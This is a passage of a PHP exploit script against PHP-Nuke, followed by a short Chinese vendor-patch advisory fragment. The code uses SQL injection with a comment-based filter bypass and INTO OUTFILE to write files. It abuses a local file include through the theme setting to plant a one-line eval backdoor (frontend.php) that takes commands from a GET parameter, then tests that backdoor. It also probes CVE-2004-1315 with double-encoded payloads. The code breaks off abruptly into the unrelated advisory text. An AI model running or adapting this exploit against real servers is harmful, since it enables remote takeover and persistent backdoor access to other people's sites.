$http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1");
$re=$http->send($attack_url."/admin.php?op=modifyUser");
//Disable error reporting
$http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";
$error_reporting=$http->send($attack_url."/admin.php");
}else{
print "*nix box detected.\n";
print "Remote path:$remote_path\n";
//Is mysql on the same machine as the httpd?
sleep(2);
$http->postdata="chng_uid=".urlencode("' or 1=(select if(substring(load_file('".$remote_path."/index.php'),1,1)='<',0,1))-- 1");
$mysql_check=$http->send($attack_url."/admin.php?op=modifyUser");
if(strstr($mysql_check,"User Doesn't Exists!")){
print("MySQL isn't on the same machine or you do not have file privileges.\n");
die("Remote code execution failed\n");
}
print "Uploading backdoor...\n";
//ipban.php
sleep(2);
//Grab the theme, this is needed to repair the database after the LFI
$theme=$http->send($attack_url."/admin.php?op=themes");
$theme=explode('src="themes/',$theme);
$theme=explode('/images/',$theme[1]);
//Repair the database after the LFI.
$backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0");';
//This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
$backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
//Install the backdoor in a relitive directory.
$backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
//charEncode is used to bypass XSS filters.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
$http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");
$http->send($attack_url."/admin.php?op=modifyUser");
sleep(2);
//local file include vulnerablity to execute /tmp/theme.php
$http->postdata="xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";
$http->send($attack_url."/admin.php");
sleep(2);
$http->postdata='';
//Fire off a get request to trigger the uploaded php file using LFI
$http->send($attack_url);
sleep(2);
//Try the LFI again, just in case.
$http->send($attack_url."/admin.php");
}
sleep(2);
//test if the backdoor works, try and clean up after the exploit.
$test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
if(strstr($test_backdoor,"31337")){
print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
}else{
print "Backdoor install failed!\n";
}
}else{
////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
print "PHP-Nuke 7 detected.\n";
$http->postdata="";//send get requests.
//Fire off a check for CVE-2004-1315, phpbb maybe installed.
//This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527
//php-nuke was not vulnerable to this because of mainfile line 50: \([^>]*"?[^)]*\)
//to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527
$try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");
//if the exploit didn't work, then we might have to enable phpbb and populate it.
if(!strstr($try_exploit,"20041315")){
//Enalbe PHPBB
$http->send($attack_url."/admin.php?op=module_status&mid=22&active=1");
//create a new category for phpbb
$http->postdata="mode=addcat&categoryname=test&addcategory=Create+new+category";
$t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php");
建议:
--------------------------------------------------------------------------------
厂商补丁:
PHP-Nuke
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: